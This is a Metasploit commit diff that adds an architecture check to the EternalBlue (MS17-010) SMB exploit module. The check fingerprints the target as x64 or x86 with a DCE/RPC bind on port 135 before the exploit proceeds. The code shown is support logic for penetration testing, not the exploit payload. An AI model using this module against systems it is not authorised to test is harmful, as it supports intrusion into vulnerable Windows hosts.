Land rapid7#8476, Implement VerifyArch for ETERNALBLUE

Brent Cook · Brent Cook · commit ea6063138aaf · 2017-05-30T00:31:32.000-05:00
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -153,12 +153,13 @@ def smb_eternalblue(process_name, grooms)
       client, tree, sock, os = smb1_anonymous_connect_ipc()
       print_good("Connection established for exploitation.")
 
-      if not verify_target(os)
-        raise EternalBlueError, "Unable to continue with improper OS Target."
+      if !verify_target(os)
+        raise EternalBlueError, 'Unable to continue with improper OS Target.'
       end
 
-      #if not verify_arch
-      #end
+      if !verify_arch
+        raise EternalBlueError, 'Unable to continue with improper OS Arch.'
+      end
 
       print_status("Trying exploit with #{grooms} Groom Allocations.")
 
@@ -235,10 +236,10 @@ def verify_target(os)
       end
 
       if ret
-        print_status("Target OS selected valid for OS indicated by SMB reply")
+        print_good('Target OS selected valid for OS indicated by SMB reply')
       else
-        print_warning("Target OS selected not valid for OS indicated by SMB reply")
-        print_warning("Disable VerifyTarget option to proceed manually...")
+        print_warning('Target OS selected not valid for OS indicated by SMB reply')
+        print_warning('Disable VerifyTarget option to proceed manually...')
       end
     end
 
@@ -248,6 +249,67 @@ def verify_target(os)
     return ret
   end
 
+  # https://github.com/CoreSecurity/impacket/blob/master/examples/getArch.py
+  # https://msdn.microsoft.com/en-us/library/cc243948.aspx#Appendix_A_53
+  def verify_arch
+    ret = false
+
+    return true if !datastore['VerifyArch']
+
+    pkt = Rex::Proto::DCERPC::Packet.make_bind(
+      # Abstract Syntax: EPMv4 V3.0
+      'e1af8308-5d1f-11c9-91a4-08002b14a0fa', '3.0',
+      # Transfer Syntax[1]: 64bit NDR V1
+      '71710533-beba-4937-8319-b5dbef9ccc36', '1.0'
+    ).first
+
+    sock = connect(false,
+      'RHOST' => rhost,
+      'RPORT' => 135
+    )
+
+    sock.put(pkt)
+
+    begin
+      res = sock.get_once(60)
+    rescue EOFError
+      print_error('DCE/RPC socket returned EOFError')
+      return false
+    end
+
+    disconnect(sock)
+
+    begin
+      resp = Rex::Proto::DCERPC::Response.new(res)
+    rescue Rex::Proto::DCERPC::Exceptions::InvalidPacket => e
+      print_error(e.to_s)
+      return false
+    end
+
+    case target_arch.first
+    when ARCH_X64
+      # Ack result: Acceptance (0)
+      if resp.ack_result.first == 0
+        ret = true
+      end
+    when ARCH_X86
+      # Ack result: Provider rejection (2)
+      # Ack reason: Proposed transfer syntaxes not supported (2)
+      if resp.ack_result.first == 2 && resp.ack_reason.first == 2
+        ret = true
+      end
+    end
+
+    if ret
+      print_good('Target arch selected valid for OS indicated by DCE/RPC reply')
+    else
+      print_warning('Target arch selected not valid for OS indicated by DCE/RPC reply')
+      print_warning('Disable VerifyArch option to proceed manually...')
+    end
+
+    ret
+  end
+
   def print_core_buffer(os)
     print_status("CORE raw buffer dump (#{os.length.to_s} bytes)")
 
